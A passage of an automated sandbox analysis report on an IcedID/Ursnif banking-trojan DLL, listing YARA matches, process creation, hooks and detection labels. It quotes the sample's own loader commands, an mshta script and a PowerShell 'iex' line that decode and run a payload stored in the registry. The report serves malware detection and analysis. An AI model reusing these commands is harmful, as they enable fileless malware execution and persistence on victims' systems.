Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Binary or memory string: OriginalFilenameMetal.dllH vs SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Tries to load missing DLLs
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Uses 32bit PE files
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@24/32@16/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E31DD CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 1_2_032E31DD
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{F6D1E166-DDA0-982C-178A-614C3B5E2540}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{CA11A837-A156-8C7F-7B9E-6580DFB269B4}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{56444DC9-BDAF-F82D-F7EA-41AC1BBE05A0}
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF267A83FE4CD46439.TMP Jump to behavior
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll',#1
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Virustotal: Detection: 21%
Source: rundll32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll'
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll',#1
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:82952 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17430 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1E30.tmp' 'c:\Users\user\AppData\Local\Temp\vy454zdn\CSCE57ED4738764ED181FB6CF8C395867D.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES310C.tmp' 'c:\Users\user\AppData\Local\Temp\vkjmiujf\CSC5E84712ED974B8AAC9F3D817F74BE40.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:82952 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17430 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1E30.tmp' 'c:\Users\user\AppData\Local\Temp\vy454zdn\CSCE57ED4738764ED181FB6CF8C395867D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES310C.tmp' 'c:\Users\user\AppData\Local\Temp\vkjmiujf\CSC5E84712ED974B8AAC9F3D817F74BE40.TMP'
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000020.00000002.440174527.0000025637660000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.449830180.000002835CB50000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.480563169.0000000006560000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000001.00000003.464838911.0000000006880000.00000004.00000001.sdmp
Source: Binary string: c:\FatSchool\syllableLetter\HuntMouth\ResultMount\Metal.pdb source: loaddll32.exe, 00000000.00000002.474041669.000000006E4F4000.00000002.00020000.sdmp, SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000001.00000003.464838911.0000000006880000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000025.00000002.475364095.00000234DE54C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000025.00000002.475364095.00000234DE54C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.480563169.0000000006560000.00000002.00000001.sdmp
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.cmdline' Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0602556E
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D2140 push ecx; ret 0_2_6E4D2149
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D6A2E push ecx; retf 0_2_6E4D6A3B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D6798 push 3AC03203h; ret 0_2_6E4D679D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D2193 push ecx; ret 0_2_6E4D21A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E43D9 push ecx; ret 0_2_6E4E43EC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E51321D push esi; ret 0_2_6E513224
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032EAF23 push ecx; ret 1_2_032EAF33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032EABF0 push ecx; ret 1_2_032EABF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602769F push ecx; ret 1_2_060276AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602D6FD push es; iretd 1_2_0602D704
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602BA6C push es; ret 1_2_0602BA6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602BA7E push eax; ret 1_2_0602BA81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06027330 push ecx; ret 1_2_06027339
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602D3E4 push es; iretd 1_2_0602D3EC
Source: C:\Windows\System32\control.exe Code function: 37_2_004EC115 push 3B000001h; retf 37_2_004EC11A
Source: C:\Windows\System32\control.exe Code function: 37_2_00521685 push es; iretd 37_2_0052168C
Source: C:\Windows\System32\control.exe Code function: 37_2_0052136C push es; iretd 37_2_00521374

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.394470622.0000000005C1B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387917414.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387785430.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387944110.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.457563065.0000000003350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387897096.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387985412.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387963889.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4880, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3412, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3888, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
